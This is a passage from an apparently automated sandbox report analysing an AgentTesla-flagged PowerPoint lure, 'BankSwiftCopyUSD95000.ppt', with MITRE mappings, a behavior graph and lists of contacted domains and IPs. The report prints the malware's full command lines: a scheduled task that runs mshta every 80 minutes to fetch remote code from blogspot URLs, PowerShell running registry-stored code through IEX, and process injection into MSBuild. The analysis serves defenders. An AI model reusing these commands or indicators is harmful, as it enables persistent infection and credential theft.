              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Injects a PE file into a foreign processesShow sources
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: unknown base: 400000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: unknown base: 400000 value starts with: 4D5A
              Writes to foreign memory regionsShow sources
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
              Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
              Source: Yara matchFile source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
              Source: Yara matchFile source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Spearphishing Link1Windows Management Instrumentation211Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools111OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting32Registry Run Keys / Startup Folder31Access Token Manipulation1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery116Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution13Logon Script (Windows)Process Injection211Scripting32Security Account ManagerQuery Registry1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Scheduled Task/Job1Obfuscated Files or Information1NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
              Cloud AccountsScheduled Task/Job1Network Logon ScriptRegistry Run Keys / Startup Folder31Extra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemRemote System Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection211/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339086 Sample: BankSwiftCopyUSD95000.ppt Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 76 www.blogger.com 2->76 78 startthepartyup.blogspot.com 2->78 80 4 other IPs or domains 2->80 116 Antivirus / Scanner detection for submitted sample 2->116 118 Multi AV Scanner detection for submitted file 2->118 120 Yara detected AgentTesla 2->120 122 15 other signatures 2->122 10 cmd.exe 1 2->10         started        12 taskeng.exe 1 2->12         started        14 mshta.exe 2->14         started        16 4 other processes 2->16 signatures3 process4 process5 18 POWERPNT.EXE 10 12 10->18         started        21 mshta.exe 10 12->21         started        23 mshta.exe 14->23         started        26 powershell.exe 16->26         started        28 mshta.exe 16->28         started        30 mshta.exe 16->30         started        dnsIp6 114 Document exploit detected (process start blacklist hit) 18->114 32 mshta.exe 11 34 18->32         started        36 PING.EXE 18->36         started        38 PING.EXE 18->38         started        40 mshta.exe 16 21->40         started        84 www.blogger.com 23->84 92 2 other IPs or domains 23->92 42 powershell.exe 23->42         started        86 paste.ee 26->86 88 www.blogger.com 28->88 94 2 other IPs or domains 28->94 90 www.blogger.com 30->90 96 2 other IPs or domains 30->96 signatures7 process8 dnsIp9 62 j.mp 67.199.248.16, 49167, 80 GOOGLE-PRIVATE-CLOUDUS United States 32->62 64 blogspot.l.googleusercontent.com 108.177.127.132, 443, 49168, 49176 GOOGLEUS United States 32->64 74 3 other IPs or domains 32->74 100 Creates autostart registry keys with suspicious values (likely registry only malware) 32->100 102 Creates multiple autostart registry keys 32->102 104 Creates an autostart registry key pointing to binary in C:\Windows 32->104 106 Creates a scheduled task launching mshta.exe (likely to bypass HIPS) 32->106 44 powershell.exe 12 6 32->44         started        48 cmd.exe 32->48         started        50 schtasks.exe 32->50         started        108 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->108 110 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 36->110 66 www.blogger.com 40->66 68 randikhanaekminar.blogspot.com 40->68 52 powershell.exe 40->52         started        70 172.67.219.133, 443, 49193 CLOUDFLARENETUS United States 42->70 72 paste.ee 42->72 112 Injects a PE file into a foreign processes 42->112 signatures10 process11 dnsIp12 98 paste.ee 104.18.49.20, 443, 49174, 49183 CLOUDFLARENETUS United States 44->98 128 Writes to foreign memory regions 44->128 130 Injects a PE file into a foreign processes 44->130 54 MSBuild.exe 44->54         started        58 taskkill.exe 48->58         started        60 taskkill.exe 48->60         started        signatures13 process14 dnsIp15 82 64.188.18.218, 49197, 49198, 49201 ASN-QUADRANET-GLOBALUS United States 54->82 124 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 54->124 126 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 54->126 signatures16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              BankSwiftCopyUSD95000.ppt35%VirustotalBrowse
              BankSwiftCopyUSD95000.ppt22%ReversingLabsScript-Macro.Downloader.Heuristic
              BankSwiftCopyUSD95000.ppt100%AviraHEUR/Macro.Downloader.MRKQ.Gen
              BankSwiftCopyUSD95000.ppt100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              29.2.MSBuild.exe.400000.2.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              j.mp0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              https://mainjigijigi123.blogspot0%Avira URL Cloudsafe
              https://mainjigijigi123.blogs0%Avira URL Cloudsafe
              http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
              http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
              http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
              http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
              http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
              http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
              http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
              http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
              https://i18n-cloud.appspot.com0%VirustotalBrowse
              https://i18n-cloud.appspot.com0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
              http://ocsp.pki.goog/gs0%Avira URL Cloudsafe
              http://ocsp.pki.goog/gsr2020%URL Reputationsafe
              http://ocsp.pki.goog/gsr2020%URL Reputationsafe
              http://ocsp.pki.goog/gsr2020%URL Reputationsafe
              http://ocsp.pki.goog/gsr2020%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
              http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
              http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
              http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              paste.ee
              104.18.49.20
              truefalse
                high
                blogspot.l.googleusercontent.com
                108.177.127.132
                truefalse
                  high
                  j.mp
                  67.199.248.16
                  truetrueunknown
                  ghostbackbone123.blogspot.com
                  unknown
                  unknownfalse
                    high
                    startthepartyup.blogspot.com
                    unknown
                    unknownfalse
                      high
                      backbones1234511a.blogspot.com
                      unknown
                      unknownfalse
                        high
                        mainjigijigi123.blogspot.com
                        unknown
                        unknownfalse
                          high
                          randikhanaekminar.blogspot.com
                          unknown
                          unknownfalse
                            high
                            www.blogger.com
                            unknown
                            unknownfalse
                              high
                              resources.blogblog.com
                              unknown
                              unknownfalse
                                high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.cssmshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpfalse
                                    high
                                    https://mainjigijigi123.blogspot.com/js/cookienotice.jspngamshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                      high
